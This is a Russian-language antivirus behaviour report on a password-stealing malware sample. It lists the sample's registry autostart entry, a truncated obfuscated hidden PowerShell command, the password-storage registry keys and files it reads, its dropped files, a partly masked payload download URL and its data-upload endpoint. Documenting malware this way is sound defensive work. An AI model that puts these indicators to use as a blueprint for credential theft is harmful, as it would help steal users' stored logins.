Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Wdp' = '%LOCALAPPDATA%\Wdp\Wdpos.vbs'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function p1fcc6 {param($y132a25)$wd7fa94='gfc24';$uea8b='';for ($i=0; $i -lt $y132a25.length;$i+=2){$t885f2b=[convert]::ToByte($y132a25.Substring($i,2),16);$uea8b+=[char](...
Внедряет код в
следующие пользовательские процессы:
- wdpwdx.exe
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
- [<HKCU>\Software\LinasFTP\Site Manager]
- [<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
- [<HKCU>\Software\Ghisler\Total Commander]
- [<HKCU>\Software\Far\Plugins\FTP\Hosts]
- [<HKCU>\Software\Far2\Plugins\FTP\Hosts]
- [<HKCU>\Software\VanDyke\SecureFX]
- [<HKLM>\Software\Wow6432Node\NCH Software\Fling\Accounts]
- [<HKCU>\Software\NCH Software\Fling\Accounts]
- [<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\SimonTatham\PuTTY\Sessions]
- [<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
- [<HKCU>\Software\Martin Prikryl]
- [<HKLM>\Software\Wow6432Node\Martin Prikryl]
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
Читает файлы, отвечающие за хранение паролей сторонними программами
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\l60ty0zx.0.cs
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %LOCALAPPDATA%\wdp\wdpos.vbs
- %LOCALAPPDATA%\wdp\wdpna.bat
- %HOMEPATH%\music\wdp.bmp
- %HOMEPATH%\music\wdpwek.exe
- %APPDATA%\wdp.ocx
- %APPDATA%\wdp.bmp
- %APPDATA%\wdpwdx.exe
- %APPDATA%\v28dc74.exe
- %TEMP%\l60ty0zx.dll
- %TEMP%\resc626.tmp
- %TEMP%\cscc616.tmp
- %TEMP%\l60ty0zx.out
- %TEMP%\l60ty0zx.cmdline
- %APPDATA%\e6f983\35a09b.hdb
- %APPDATA%\e6f983\35a09b.lck
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\e6f983\35a09b.exe
Удаляет следующие файлы
- %TEMP%\resc626.tmp
- %TEMP%\cscc616.tmp
- %TEMP%\l60ty0zx.dll
- %TEMP%\l60ty0zx.cmdline
- %TEMP%\l60ty0zx.pdb
- %TEMP%\l60ty0zx.out
- %TEMP%\l60ty0zx.0.cs
- %APPDATA%\wdp.ocx
- %APPDATA%\e6f983\35a09b.lck
Перемещает следующие файлы
- %APPDATA%\wdpwdx.exe в %APPDATA%\e6f983\35a09b.exe
Подменяет следующие файлы
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Сетевая активность
Подключается к
- 'ef##e.info':80
TCP
Запросы HTTP GET
- http://ka###tel.info/paclif.exe
Запросы HTTP POST
- http://ef##e.info/paclif/five/fre.php
UDP
- DNS ASK ka###tel.info
- DNS ASK ef##e.info
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\v28dc74.exe'
- '%APPDATA%\wdpwdx.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l60ty0zx.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC626.tmp" "%TEMP%\CSCC616.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\l60ty0zx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC626.tmp" "%TEMP%\CSCC616.tmp"
